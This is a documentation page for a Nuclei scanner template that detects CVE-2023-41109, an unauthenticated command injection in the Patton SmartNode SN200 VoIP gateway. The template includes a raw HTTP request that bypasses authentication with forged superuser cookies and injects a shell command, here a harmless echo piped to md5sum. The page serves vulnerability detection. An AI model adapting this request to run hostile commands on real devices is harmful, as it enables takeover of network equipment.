SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway - Command Injection
ID: CVE-2023-41109
Severity: critical
Author: princechaddha
Tags: cve,cve2023,smartnode,voip,patton
Description
Section titled “Description”The SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway is vulnerable to command injection.
YAML Source
Section titled “YAML Source”id: CVE-2023-41109
info: name: SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway - Command Injection author: princechaddha severity: critical description: | The SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway is vulnerable to command injection. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: |- - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-019.txt - https://nvd.nist.gov/vuln/detail/CVE-2023-41109 - http://packetstormsecurity.com/files/175945/SmartNode-SN200-3.21.2-23021-OS-Command-Injection.html - http://seclists.org/fulldisclosure/2023/Nov/12 - https://www.syss.de/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-41109 cwe-id: CWE-78 epss-score: 0.33157 epss-percentile: 0.97044 cpe: cpe:2.3:h:patton:smartnode_sn200:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: patton product: smartnode_sn200 tags: cve,cve2023,smartnode,voip,pattonvariables: payload: "echo CVE-2023-41109 | md5sum"
http: - raw: - | POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1 Host: {{Hostname}} Cookie: AuthToken=; AuthGroup=superuser; UserName=admin
{"cmd":"{{payload}}","arguments":[]}
matchers: - type: word part: body words: - "dd556350275e2ee0a2e877cea9c8a74a"# digest: 4a0a0047304502205975d8d80ad0a97e863fb3a2bd2a26d82f309c360f6dc545afe57ed253ea2d1e022100ab1a6fd41e84c4b1e3d6b66b65ebb4a1f252abece56468d8cce1850406344fe0:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-41109.yaml"